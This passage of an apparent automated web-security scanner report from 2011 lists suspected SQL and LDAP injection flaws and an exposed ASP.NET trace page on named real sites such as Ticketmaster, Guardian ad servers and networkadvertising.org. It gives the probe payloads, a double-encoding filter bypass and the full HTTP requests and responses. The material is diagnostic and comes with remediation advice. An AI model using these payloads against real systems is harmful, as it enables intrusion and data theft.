<a href="/video/player/news/mumbai-plane-skids-off-runway-closed/209620" title="Mumbai: Plane skids off
...[SNIP]...

1.14. http://www.networkadvertising.org/managing/optout_results.asp [__utmb cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.networkadvertising.org
Path:	/managing/optout_results.asp

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1'%20and%201%3d1--%20; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:42:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:42:04 GMT
Cache-control: no-cache

<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>

       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">

<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.4001276 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.317268 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=9.700519E-02 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.4922144 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.3065867 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking
...[SNIP]...

Request 2

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1'%20and%201%3d2--%20; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:42:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:42:04 GMT
Cache-control: no-cache

<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>

       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">

<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=5.845279E-02 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.9755932 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.7553304 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.1505396 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.9649119 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clickin
...[SNIP]...

1.15. http://www.ticketmaster.com/Sporting-Kansas-City-tickets/artist/805957 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.ticketmaster.com
Path:	/Sporting-Kansas-City-tickets/artist/805957

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Sporting-Kansas-City-tickets/artist/805957?1%2527=1 HTTP/1.1
Host: www.ticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Server: Apache
X-TM-GTM-Origin: tmol-us-els1
Vary: Cookie,Accept-Encoding
Last-Modified: Sat, 03 Sep 2011 06:20:35 GMT
ETag: "a420-79c9f2c0"
Content-Length: 42016
Content-Type: text/html; charset=utf-8
Date: Sun, 04 Sep 2011 04:44:33 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: NEWSEARCH=1; path=/; domain=.ticketmaster.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns=
...[SNIP]...

Request 2

GET /Sporting-Kansas-City-tickets/artist/805957?1%2527%2527=1 HTTP/1.1
Host: www.ticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash2
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR NID CURa ADMa DEVa PSAa OUR IND COM NAV INT"
Content-Type: text/html; charset=utf-8
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Date: Sun, 04 Sep 2011 04:44:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: NEWSEARCH=1; path=/; domain=.ticketmaster.com
Set-Cookie: NDMA=261; path=/; domain=.ticketmaster.com
Set-Cookie: BRAND=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970
Set-Cookie: ORIGIN=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970
Content-Length: 353895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoc
...[SNIP]...

2. ASP.NET tracing enabled previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trk.tidaltv.com
Path:	/trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Issue background

ASP.NET tracing is a debugging feature which is designed for use during development to help troubleshoot problems. It discloses sensitive information to users, and if enabled in production contexts may present a serious security threat.

Application-level tracing enables any user to retrieve full details about recent requests to the application, including those of other users. This information includes session tokens and request parameters, which may enable an attacker to compromise other users and even take control of the entire application.

Page-level tracing returns the same information, but relating only to the current request. This may still contain sensitive data in session and server variables which would be of use to an attacker.

Issue remediation

To disable tracing, open the Web.config file for the application, and find the <trace> element within the <system.web> section. Either set the enabled attribute to "false" (to disable tracing) or set the localOnly attribute to "true" (to enable tracing only on the server itself).

Note that even with tracing disabled in this way, it is possible for individual pages to turn on page-level tracing either within the Page directive of the ASP.NET page, or programmatically through application code. If you observe tracing output only on some application pages, you should review the page source and the code behind, to find the reason why tracing is occurring.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

GET /trace.axd HTTP/1.0
Host: trk.tidaltv.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 03:21:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9761

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" width="100%">
...[SNIP]...

3. LDAP injection previous next
There are 7 instances of this issue:

http://ads.masslive.com/RealMedia/ads/adstream.cap [c parameter]
http://ads.mlive.com/RealMedia/ads/adstream.cap [c parameter]
http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]
http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [c parameter]
http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]
http://pixel.quantserve.com/optout_set [nocache parameter]
http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter]

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

3.1. http://ads.masslive.com/RealMedia/ads/adstream.cap [c parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ads.masslive.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The c parameter appears to be vulnerable to LDAP injection attacks.

The payloads d50338daf3e58a8e)(sn=* and d50338daf3e58a8e)!(sn=* were each submitted in the c parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /RealMedia/ads/adstream.cap?c=d50338daf3e58a8e)(sn=*&va=1&e=30d HTTP/1.1
Host: ads.masslive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 1

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:44 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: d50338daf3e58a8e)(sn=*=1; expires=Tue, 04-Oct-11 04:02:44 GMT; path=/; domain=.masslive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:44 GMT;path=/;httponly

Request 2

GET /RealMedia/ads/adstream.cap?c=d50338daf3e58a8e)!(sn=*&va=1&e=30d HTTP/1.1
Host: ads.masslive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 2

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:45 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: d50338daf3e58a8e)!(sn=*=1; expires=Tue, 04-Oct-11 04:02:45 GMT; path=/; domain=.masslive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:45 GMT;path=/;httponly

3.2. http://ads.mlive.com/RealMedia/ads/adstream.cap [c parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ads.mlive.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The c parameter appears to be vulnerable to LDAP injection attacks.

The payloads e3ef65172939bcb1)(sn=* and e3ef65172939bcb1)!(sn=* were each submitted in the c parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /RealMedia/ads/adstream.cap?c=e3ef65172939bcb1)(sn=*&va=1&e=30d HTTP/1.1
Host: ads.mlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 1

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:54 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: e3ef65172939bcb1)(sn=*=1; expires=Tue, 04-Oct-11 04:02:54 GMT; path=/; domain=.mlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:54 GMT;path=/;httponly

Request 2

GET /RealMedia/ads/adstream.cap?c=e3ef65172939bcb1)!(sn=*&va=1&e=30d HTTP/1.1
Host: ads.mlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 2

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:56 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: e3ef65172939bcb1)!(sn=*=1; expires=Tue, 04-Oct-11 04:02:56 GMT; path=/; domain=.mlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:56 GMT;path=/;httponly

3.3. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ads.oregonlive.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The c parameter appears to be vulnerable to LDAP injection attacks.

The payloads da535e840f4ff729)(sn=* and da535e840f4ff729)!(sn=* were each submitted in the c parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /RealMedia/ads/adstream.cap?c=da535e840f4ff729)(sn=*&va=1&e=30d HTTP/1.1
Host: ads.oregonlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 1

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:01 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: da535e840f4ff729)(sn=*=1; expires=Tue, 04-Oct-11 04:02:01 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171b45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:01 GMT;path=/;httponly

Request 2

GET /RealMedia/ads/adstream.cap?c=da535e840f4ff729)!(sn=*&va=1&e=30d HTTP/1.1
Host: ads.oregonlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 2

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:02 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: da535e840f4ff729)!(sn=*=1; expires=Tue, 04-Oct-11 04:02:02 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171b45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:02 GMT;path=/;httponly

3.4. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [c parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://oas.guardian.co.uk
Path:	/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e

Issue detail

The c parameter appears to be vulnerable to LDAP injection attacks.

The payloads 8dbd5612db703933)(sn=* and 8dbd5612db703933)!(sn=* were each submitted in the c parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e?c=8dbd5612db703933)(sn=*&dv=1&e=30d HTTP/1.1
Host: oas.guardian.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c

Response 1

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 8dbd5612db703933)(sn=*=1; expires=Tue, 04-Oct-11 04:00:54 GMT; path=/; domain=.guardian.co.uk
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

Request 2

GET /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e?c=8dbd5612db703933)!(sn=*&dv=1&e=30d HTTP/1.1
Host: oas.guardian.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c

Response 2

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 8dbd5612db703933)!(sn=*=1; expires=Tue, 04-Oct-11 04:00:54 GMT; path=/; domain=.guardian.co.uk
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

3.5. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://oasc12.247realmedia.com
Path:	/RealMedia/ads/adstream.cap/123

Issue detail

The c parameter appears to be vulnerable to LDAP injection attacks.

The payloads 1aa9d7b3bcb1543a)(sn=* and 1aa9d7b3bcb1543a)!(sn=* were each submitted in the c parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /RealMedia/ads/adstream.cap/123?c=1aa9d7b3bcb1543a)(sn=*&va=1&e=30d HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022jF2

Response 1

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 1aa9d7b3bcb1543a)(sn=*=1; expires=Tue, 04-Oct-11 04:00:12 GMT; path=/; domain=.247realmedia.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

Request 2

GET /RealMedia/ads/adstream.cap/123?c=1aa9d7b3bcb1543a)!(sn=*&va=1&e=30d HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022jF2

Response 2

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 1aa9d7b3bcb1543a)!(sn=*=1; expires=Tue, 04-Oct-11 04:00:13 GMT; path=/; domain=.247realmedia.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

3.6. http://pixel.quantserve.com/optout_set [nocache parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://pixel.quantserve.com
Path:	/optout_set

Issue detail

The nocache parameter appears to be vulnerable to LDAP injection attacks.

The payloads c775130afbcbeffd)(sn=* and c775130afbcbeffd)!(sn=* were each submitted in the nocache parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /optout_set?s=nai&nocache=c775130afbcbeffd)(sn=* HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
